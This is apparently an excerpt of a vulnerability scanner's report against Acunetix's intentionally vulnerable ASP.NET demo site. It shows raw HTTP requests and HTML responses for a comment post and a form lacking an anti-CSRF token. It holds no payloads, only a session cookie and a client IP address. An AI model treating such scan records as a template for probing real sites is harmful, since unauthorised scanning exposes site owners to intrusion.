Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="default.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" 